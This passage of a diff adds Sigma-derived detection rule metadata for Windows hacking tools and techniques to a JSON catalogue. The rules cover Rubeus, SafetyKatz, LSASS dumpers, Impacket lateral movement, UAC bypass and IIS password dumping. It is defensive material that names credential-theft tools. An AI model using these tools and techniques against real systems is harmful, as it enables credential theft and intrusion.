+ "uuid": "aaafa146-074c-11eb-adc1-0242ac120002", + "value": "Hydra Password Guessing Hack Tool", + "meta": { + "refs": [ + "https://github.com/vanhauser-thc/thc-hydra", + "https://attack.mitre.org/techniques/T1110/001/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_hydra.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1110", + "attack.t1110.001" + ], + "creation_date": "2020/10/05", + "filename": "proc_creation_win_hack_hydra.yml", + "author": "Vasiliy Burov", + "level": "high", + "falsepositive": [ + "Software that uses the caret encased keywords PASS and USER in its command line" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the use of Inveigh a cross-platform .NET IPv4/IPv6 machine-in-the-middle tool", + "uuid": "b99a1518-1ad5-4f65-bc95-1ffff97a8fd0", + "value": "Inveigh Hack Tool", + "meta": { + "refs": [ + "https://github.com/Kevin-Robertson/Inveigh", + "https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_inveigh.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ], + "creation_date": "2022/10/24", + "filename": "proc_creation_win_hack_inveigh.yml", + "author": "Nasreddine Bencherchali", + "level": "critical", + "falsepositive": [ + "Very unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects command line parameters used by Koadic hack tool", + "uuid": "5cddf373-ef00-4112-ad72-960ac29bac34", + "value": "Koadic Execution", + "meta": { + "refs": [ + "https://unit42.paloaltonetworks.com/unit42-sofacy-groups-parallel-attacks/", + "https://github.com/offsecginger/koadic/blob/457f9a3ff394c989cdb4c599ab90eb34fb2c762c/data/stager/js/stdlib.js", + "https://blog.f-secure.com/hunting-for-koadic-a-com-based-rootkit/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_koadic.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.003", + "attack.t1059.005", + "attack.t1059.007" + ], + "creation_date": "2020/01/12", + "filename": "proc_creation_win_hack_koadic.yml", + "author": "wagga, Jonhnathan Ribeiro, oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the use of KrbRelay, a Kerberos relaying tool", + "uuid": "e96253b8-6b3b-4f90-9e59-3b24b99cf9b4", + "value": "KrbRelay Hack Tool", + "meta": { + "refs": [ + "https://github.com/cube0x0/KrbRelay", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_krbrelay.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1558.003" + ], + "creation_date": "2022/04/27", + "filename": "proc_creation_win_hack_krbrelay.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects KrbRelayUp used to perform a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced", + "uuid": "12827a56-61a4-476a-a9cb-f3068f191073", + "value": "KrbRelayUp Hack Tool", + "meta": { + "refs": [ + "https://github.com/Dec0ne/KrbRelayUp", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_krbrelayup.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1558.003", + "attack.lateral_movement", + "attack.t1550.003" + ], + "creation_date": "2022/04/26", + "filename": "proc_creation_win_hack_krbrelayup.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the execution of the hacktool Rubeus via PE information of command line parameters", + "uuid": "7ec2c172-dceb-4c10-92c9-87c1881b7e18", + "value": "Rubeus Hack Tool", + "meta": { + "refs": [ + "https://www.harmj0y.net/blog/redteaming/from-kekeo-to-rubeus/", + "https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html", + "https://github.com/GhostPack/Rubeus", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_rubeus.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003", + "attack.t1558.003", + "attack.lateral_movement", + "attack.t1550.003" + ], + "creation_date": "2018/12/19", + "filename": "proc_creation_win_hack_rubeus.yml", + "author": "Florian Roth", + "level": "critical", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the execution of the hacktool SafetyKatz via PE information and default Image name", + "uuid": "b1876533-4ed5-4a83-90f3-b8645840a413", + "value": "SafetyKatz Hack Tool", + "meta": { + "refs": [ + "https://github.com/GhostPack/SafetyKatz", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_safetykatz.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ], + "creation_date": "2022/10/20", + "filename": "proc_creation_win_hack_safetykatz.yml", + "author": "Nasreddine Bencherchali", + "level": "critical", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the execution of SecurityXploded Tools", + "uuid": "7679d464-4f74-45e2-9e01-ac66c5eb041a", + "value": "SecurityXploded Tool", + "meta": { + "refs": [ + "https://securityxploded.com/", + "https://cyberx-labs.com/blog/gangnam-industrial-style-apt-campaign-targets-korean-industrial-companies/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_secutyxploded.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1555" + ], + "creation_date": "2018/12/19", + "filename": "proc_creation_win_hack_secutyxploded.yml", + "author": "Florian Roth", + "level": "critical", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the execution of the hacktool SharPersist - used to deploy various different kinds of persistence mechanisms", + "uuid": "26488ad0-f9fd-4536-876f-52fea846a2e4", + "value": "SharPersist Usage", + "meta": { + "refs": [ + "https://www.mandiant.com/resources/blog/sharpersist-windows-persistence-toolkit", + "https://github.com/mandiant/SharPersist", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_sharpersist.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1053" + ], + "creation_date": "2022/09/15", + "filename": "proc_creation_win_hack_sharpersist.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects SharpLdapWhoami, a whoami alternative by asking the LDAP service on a domain controller", + "uuid": "d9367cbb-c2e0-47ce-bdc0-128cb6da898d", + "value": "SharpLdapWhoami", + "meta": { + "refs": [ + "https://github.com/bugch3ck/SharpLdapWhoami", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_sharpldapwhoami.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1033", + "car.2016-03-001" + ], + "creation_date": "2022/08/29", + "filename": "proc_creation_win_hack_sharpldapwhoami.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Programs that use the same command line flags" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the execution of the PoC that can be used to exploit Sysmon CVE-2022-41120", + "uuid": "8a7e90c5-fe6e-45dc-889e-057fe4378bd9", + "value": "SysmonEOP Hack Tool", + "meta": { + "refs": [ + "https://github.com/Wh04m1001/SysmonEoP", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_sysmoneop.yml" + ], + "tags": [ + "cve.2022.41120", + "attack.t1068", + "attack.privilege_escalation" + ], + "creation_date": "2022/12/04", + "filename": "proc_creation_win_hack_sysmoneop.yml", + "author": "Florian Roth", + "level": "critical", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the use of Windows Credential Editor (WCE)", + "uuid": "7aa7009a-28b9-4344-8c1f-159489a390df", + "value": "Windows Credential Editor", + "meta": { + "refs": [ + "https://www.ampliasecurity.com/research/windows-credentials-editor/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_wce.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001", + "attack.s0005" + ], + "creation_date": "2019/12/31", + "filename": "proc_creation_win_hack_wce.yml", + "author": "Florian Roth", + "level": "critical", + "falsepositive": [ + "Another service that uses a single -s command line switch" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the use of HandleKatz, a tool that demonstrates the usage of cloned handles to Lsass in order to create an obfuscated memory dump of the same", + "uuid": "ca621ba5-54ab-4035-9942-d378e6fcde3c", + "value": "HandleKatz LSASS Dumper Usage", + "meta": { + "refs": [ + "https://github.com/codewhitesec/HandleKatz", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_handlekatz.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ], + "creation_date": "2022/08/18", + "filename": "proc_creation_win_handlekatz.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Execute Hashcat.exe with provided SAM file from registry of Windows and Password list to crack against", + "uuid": "39b31e81-5f5f-4898-9c0e-2160cfc0f9bf", + "value": "Password Cracking with Hashcat", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1110.002/T1110.002.md#atomic-test-1---password-cracking-with-hashcat", + "https://hashcat.net/wiki/doku.php?id=hashcat", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hashcat.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1110.002" + ], + "creation_date": "2021/12/27", + "filename": "proc_creation_win_hashcat.yml", + "author": "frack113", + "level": "high", + "falsepositive": [ + "Tools that accidentally use the same command line flags and values" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "This is an unusual method to download files. It starts a browser headless and downloads a file from a location. This can be used by threat actors to download files.", + "uuid": "0e8cfe08-02c9-4815-a2f8-0d157b7ed33e", + "value": "File Download with Headless Browser", + "meta": { + "refs": [ + "https://twitter.com/mrd0x/status/1478234484881436672?s=12", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_headless_browser_file_download.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105" + ], + "creation_date": "2022/01/04", + "filename": "proc_creation_win_headless_browser_file_download.yml", + "author": "Sreeman, Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Identifies usage of hh.exe executing recently modified .chm files.", + "uuid": "68c8acb4-1b60-4890-8e82-3ddf7a6dba84", + "value": "HH.exe Execution", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.001/T1218.001.md", + "https://eqllib.readthedocs.io/en/latest/analytics/b25aa548-7937-11e9-8f5c-d46d6d62a49e.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hh_chm.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.001" + ], + "creation_date": "2019/10/24", + "filename": "proc_creation_win_hh_chm.yml", + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Dan Beavin), oscd.community", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects usage of hh.exe to execute/download remotely hosted .chm files.", + "uuid": "f57c58b3-ee69-4ef5-9041-455bf39aaa89", + "value": "HH.exe Remote CHM File Execution", + "meta": { + "refs": [ + "https://www.splunk.com/en_us/blog/security/follina-for-protocol-handlers.html", + "https://github.com/redcanaryco/atomic-red-team/blob/1cf4dd51f83dcb0ebe6ade902d6157ad2dbc6ac8/atomics/T1218.001/T1218.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hh_chm_http.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.001" + ], + "creation_date": "2022/09/29", + "filename": "proc_creation_win_hh_chm_http.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Monitors for the hiding possible malicious files in the C:\\Windows\\Fonts\\ location. This folder doesn't require admin privillege to be written and executed from.", + "uuid": "ae9b0bd7-8888-4606-b444-0ed7410cb728", + "value": "Writing Of Malicious Files To The Fonts Folder", + "meta": { + "refs": [ + "https://thedfirreport.com/2020/04/20/sqlserver-or-the-miner-in-the-basement/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hiding_malware_in_fonts_folder.yml" + ], + "tags": [ + "attack.t1211", + "attack.t1059", + "attack.defense_evasion", + "attack.persistence" + ], + "creation_date": "2020/04/21", + "filename": "proc_creation_win_hiding_malware_in_fonts_folder.yml", + "author": "Sreeman", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "A General detection for sdclt being spawned as an elevated process. This could be an indicator of sdclt being used for bypass UAC techniques.", + "uuid": "40f9af16-589d-4984-b78d-8c2aec023197", + "value": "High Integrity Sdclt Process", + "meta": { + "refs": [ + "https://github.com/OTRF/detection-hackathon-apt29/issues/6", + "https://threathunterplaybook.com/evals/apt29/detections/3.B.2_C36B49B5-DF58-4A34-9FE9-56189B9DEFEA.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_high_integrity_sdclt.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1548.002" + ], + "creation_date": "2020/05/02", + "filename": "proc_creation_win_high_integrity_sdclt.yml", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the use of CreateMiniDump hack tool used to dump the LSASS process memory for credential extraction on the attacker's machine", + "uuid": "36d88494-1d43-4dc0-b3fa-35c8fea0ca9d", + "value": "CreateMiniDump Hacktool", + "meta": { + "refs": [ + "https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsass-passwords-without-mimikatz-minidumpwritedump-av-signature-bypass", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_createminidump.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ], + "creation_date": "2019/12/22", + "filename": "proc_creation_win_hktl_createminidump.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects execution of UACMe (a tool used for UAC bypass) via default PE metadata", + "uuid": "d38d2fa4-98e6-4a24-aff1-410b0c9ad177", + "value": "UAC Bypass Tool UACMe Akagi", + "meta": { + "refs": [ + "https://github.com/hfiref0x/UACME", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ], + "creation_date": "2021/08/30", + "filename": "proc_creation_win_hktl_uacme_uac_bypass.yml", + "author": "Christian Burkard, Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a suspicious child process of a Microsoft HTML Help system when executing compiled HTML files (.chm)", + "uuid": "52cad028-0ff0-4854-8f67-d25dfcbc78b4", + "value": "HTML Help Shell Spawn", + "meta": { + "refs": [ + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/chm-badness-delivers-a-banking-trojan/", + "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-27939090904026cc396b0b629c8e4314acd6f5dac40a676edbc87f4567b47eb7", + "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_html_help_spawn.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.001", + "attack.t1218.010", + "attack.t1218.011", + "attack.execution", + "attack.t1059.001", + "attack.t1059.003", + "attack.t1059.005", + "attack.t1059.007", + "attack.t1047", + "attack.t1566", + "attack.t1566.001", + "attack.initial_access", + "attack.t1218" + ], + "creation_date": "2020/04/01", + "filename": "proc_creation_win_html_help_spawn.yml", + "author": "Maxim Pavlunin", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious Hangul Word Processor (Hanword) sub processes that could indicate an exploitation", + "uuid": "023394c4-29d5-46ab-92b8-6a534c6f447b", + "value": "Suspicious HWP Sub Processes", + "meta": { + "refs": [ + "https://www.securitynewspaper.com/2016/11/23/technical-teardown-exploit-malware-hwp-files/", + "https://www.hybrid-analysis.com/search?query=context:74940dcc5b38f9f9b1a0fea760d344735d7d91b610e6d5bd34533dd0153402c5&from_sample=5db135000388385a7644131f&block_redirect=1", + "https://twitter.com/cyberwar_15/status/1187287262054076416", + "https://blog.alyac.co.kr/1901", + "https://en.wikipedia.org/wiki/Hangul_(word_processor)", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hwp_exploits.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1566.001", + "attack.execution", + "attack.t1203", + "attack.t1059.003", + "attack.g0032" + ], + "creation_date": "2019/10/24", + "filename": "proc_creation_win_hwp_exploits.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detect use of icacls to deny access for everyone in Users folder sometimes used to hide malicious files", + "uuid": "4ae81040-fc1c-4249-bfa3-938d260214d9", + "value": "Use Icacls to Hide File to Everyone", + "meta": { + "refs": [ + "https://app.any.run/tasks/1df999e6-1cb8-45e3-8b61-499d1b7d5a9b/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_icacls_deny.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564.001" + ], + "creation_date": "2022/07/18", + "filename": "proc_creation_win_icacls_deny.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Legitimate use" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects use of aspnet_regiis to decrypt Microsoft IIS connection strings. An attacker with Microsoft IIS web server access via a webshell or alike can decrypt and dump any hardcoded connection strings, such as the MSSQL service account password using aspnet_regiis command.", + "uuid": "97dbf6e2-e436-44d8-abee-4261b24d3e41", + "value": "Microsoft IIS Connection Strings Decryption", + "meta": { + "refs": [ + "https://www.elastic.co/guide/en/security/current/microsoft-iis-connection-strings-decryption.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_iis_connection_strings_decryption.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003" + ], + "creation_date": "2022/09/28", + "filename": "proc_creation_win_iis_connection_strings_decryption.yml", + "author": "Tim Rauch", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Disables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union)", + "uuid": "e4ed6030-ffe5-4e6a-8a8a-ab3c1ab9d94e", + "value": "Disable Windows IIS HTTP Logging", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.002/T1562.002.md#atomic-test-1---disable-windows-iis-http-logging", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_iis_http_logging.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.002" + ], + "creation_date": "2022/01/09", + "filename": "proc_creation_win_iis_http_logging.yml", + "author": "frack113", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the Internet Information Services (IIS) command-line tool, AppCmd, being used to list passwords", + "uuid": "2d3cdeec-c0db-45b4-aa86-082f7eb75701", + "value": "Microsoft IIS Service Account Password Dumped", + "meta": { + "refs": [ + "https://www.elastic.co/guide/en/security/current/microsoft-iis-service-account-password-dumped.html", + "https://twitter.com/0gtweet/status/1588815661085917186?cxt=HHwWhIDUyaDbzYwsAAAA", + "https://www.netspi.com/blog/technical/network-penetration-testing/decrypting-iis-passwords-to-break-out-of-the-dmz-part-2/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_iis_service_account_password_dumped.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003" + ], + "creation_date": "2022/11/08", + "filename": "proc_creation_win_iis_service_account_password_dumped.yml", + "author": "Tim Rauch, Janantha Marasinghe", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects unusual parent or children of the ImagingDevices.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) processes as seen being used with bumblebee activity", + "uuid": "f11f2808-adb4-46c0-802a-8660db50fa99", + "value": "ImagingDevices Unusual Parent Or Child Processes", + "meta": { + "refs": [ + "https://thedfirreport.com/2022/09/26/bumblebee-round-two/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_imaging_devices_unusual_parents.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.execution" + ], + "creation_date": "2022/09/27", + "filename": "proc_creation_win_imaging_devices_unusual_parents.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the execution of different compiled Windows binaries of the impacket toolset (based on names or part of their names - could lead to false positives)", + "uuid": "4627c6ae-6899-46e2-aa0c-6ebcb1becd19", + "value": "Impacket Tool Execution", + "meta": { + "refs": [ + "https://github.com/ropnop/impacket_static_binaries/releases/tag/0.9.21-dev-binaries", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_impacket_compiled_tools.yml" + ], + "tags": [ + "attack.execution", + "attack.t1557.001" + ], + "creation_date": "2021/07/24", + "filename": "proc_creation_win_impacket_compiled_tools.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Legitimate use of the impacket tools" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects wmiexec/dcomexec/atexec/smbexec from Impacket framework", + "uuid": "10c14723-61c7-4c75-92ca-9af245723ad2", + "value": "Impacket Lateralization Detection", + "meta": { + "refs": [ + "https://github.com/SecureAuthCorp/impacket/blob/8b1a99f7c715702eafe3f24851817bb64721b156/examples/wmiexec.py", + "https://github.com/SecureAuthCorp/impacket/blob/8b1a99f7c715702eafe3f24851817bb64721b156/examples/atexec.py", + "https://github.com/SecureAuthCorp/impacket/blob/8b1a99f7c715702eafe3f24851817bb64721b156/examples/smbexec.py", + "https://github.com/SecureAuthCorp/impacket/blob/8b1a99f7c715702eafe3f24851817bb64721b156/examples/dcomexec.py", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_impacket_lateralization.yml" + ], + "tags": [ + "attack.execution", + "attack.t1047", + "attack.lateral_movement", + "attack.t1021.003" + ], + "creation_date": "2019/09/03", + "filename": "proc_creation_win_impacket_lateralization.yml", + "author": "Ecco, oscd.community, Jonhnathan Ribeiro", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.", + "uuid": "5f6a601c-2ecb-498b-9c33-660362323afa", + "value": "Root Certificate Installed From Susp Locations", + "meta": { + "refs": [ + "https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/", + "https://docs.microsoft.com/en-us/powershell/module/pki/import-certificate?view=windowsserver2022-ps", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_import_cert_susp_locations.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1553.004" + ], + "creation_date": "2022/09/09", + "filename": "proc_creation_win_import_cert_susp_locations.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detect indirect command execution via Program Compatibility Assistant (pcalua.exe or forfiles.exe).", + "uuid": "fa47597e-90e9-41cd-ab72-c3b74cfb0d02", + "value": "Indirect Command Execution", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1202/T1202.md", + "https://eqllib.readthedocs.io/en/latest/analytics/884a7ccd-7305-4130-82d0-d4f90bc118b6.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_indirect_cmd.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1202" + ], + "creation_date": "2019/10/24", + "filename": "proc_creation_win_indirect_cmd.yml", + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", + "level": "low", + "falsepositive": [ + "Need to use extra processing with 'unique_count' / 'filter' to focus on outliers as opposed to commonly seen artifacts.", + "Legitimate usage of scripts." + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the use of native Windows tool, forfiles to execute a file. Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.", + "uuid": "a85cf4e3-56ee-4e79-adeb-789f8fb209a8", + "value": "Indirect Command Exectuion via Forfiles", + "meta": { + "refs": [ + "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-73d61931b2c77fde294189ce5d62323b416296a7c23ea98a608f425566538d1a", + "https://lolbas-project.github.io/lolbas/Binaries/Forfiles/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_indirect_command_execution_forfiles.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1202" + ], + "creation_date": "2022/10/17", + "filename": "proc_creation_win_indirect_command_execution_forfiles.yml", + "author": "Tim Rauch (rule), Elastic (idea)", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Executes SCT script using scrobj.dll from a command in entered into a specially prepared INF file.", + "uuid": "ce7cf472-6fcc-490a-9481-3786840b5d9b", + "value": "InfDefaultInstall.exe .inf Execution", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md#atomic-test-4---infdefaultinstallexe-inf-execution", + "https://lolbas-project.github.io/lolbas/Binaries/Infdefaultinstall/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_infdefaultinstall.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ], + "creation_date": "2021/07/13", + "filename": "proc_creation_win_infdefaultinstall.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects encoded base64 MZ header in the commandline", + "uuid": "22e58743-4ac8-4a9f-bf19-00a0428d8c5f", + "value": "Base64 MZ Header In CommandLine", + "meta": { + "refs": [ + "https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_inline_base64_mz_header.yml" + ], + "tags": [ + "attack.execution" + ], + "creation_date": "2022/07/12", + "filename": "proc_creation_win_inline_base64_mz_header.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the use of WinAPI Functions via the commandline as seen used by threat actors via the tool winapiexec", + "uuid": "ba3f5c1b-6272-4119-9dbd-0bc8d21c2702", + "value": "Accessing WinAPI Via CommandLine", + "meta": { + "refs": [ + "https://twitter.com/m417z/status/1566674631788007425", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_inline_win_api_access.yml" + ], + "tags": [ + "attack.execution", + "attack.t1106" + ], + "creation_date": "2022/09/06", + "filename": "proc_creation_win_inline_win_api_access.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the registration of a debugger for a program that is available in the logon screen (sticky key backdoor).", + "uuid": "ae215552-081e-44c7-805f-be16f975c8a2", + "value": "Suspicious Debugger Registration Cmdline", + "meta": { + "refs": [ + "https://blogs.technet.microsoft.com/jonathantrull/2016/10/03/detecting-sticky-key-backdoors/", + 